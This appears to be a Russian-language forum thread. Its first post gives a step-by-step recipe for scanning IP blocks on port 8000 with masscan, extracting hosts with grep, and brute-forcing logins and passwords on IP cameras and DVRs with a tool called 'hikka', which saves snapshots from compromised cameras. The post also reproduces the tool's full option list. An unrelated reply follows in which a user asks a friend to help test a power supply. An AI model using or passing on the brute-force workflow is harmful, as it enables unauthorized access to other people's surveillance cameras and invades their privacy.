В папке Masscan в targets.txt вставим блоки IP. Запуск сканирования: masscan -p8000 -iL targets.txt --rate=10000 -oX myscan.xml. По окончании сканирования парсим myscan.xml Grep (http://gnuwin32.sourceforge.net/packages/grep.htm ): grep -E -o "([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])" myscan.xml > hosts. Переходим к Hikka. В logins и passwords должны быть ваши логины и пароли. Запуск перебора: hikka -threads 200 -check -shoots good. В папку good будут сохранятся изображения с камер. Теперь можно подключиться к видеорегистратору при помощи программы IVMS-4200 http://overseas.hikvision.com/europe/Tools_84.html .
Полный список команд hikka -h:
-bf-threads int Bruteforcer threads count (default 1) -check Check cameras (experimental and not fully tested, but very useful) -csv string Write result to CSV -json string Write result to JSON -logins string A file with a list of logins to bruteforce (default "logins") -m3u string Write result to m3u playlist -passwords string A file with a list of passwords to bruteforce (default "passwords") -port int Camera service port (default 8000) -shoots string Download pics from cameras into a folder -threads int Threads count (default 1)
>>64619 Сань, привет. Несколько неловко обращаться к тебе, но, увы иных вариантов у меня особо не осталось. В общем комп мой опять мозги , мне понятно что по любому нужно менять либо мать, либо БП. Вот только чекнуть что именно наелось возможности нет. Точнее я уже что только не предпринял, история долгая, минут на десять словесного описания. В общем, мне бы перекинуть БП/мой БП мультиметром глянуть. И то и, то у тебя вроде было. Я бы к тебе лыжи намылил с этой рухлядью, если тебя бы не затруднило. В любое время, на все про все уйдет минут 10-15, правда прийдется повозиться с проводами (в случае перекидывания БП). Затраты времени/внимания готов поощрить условной "шоколадкой".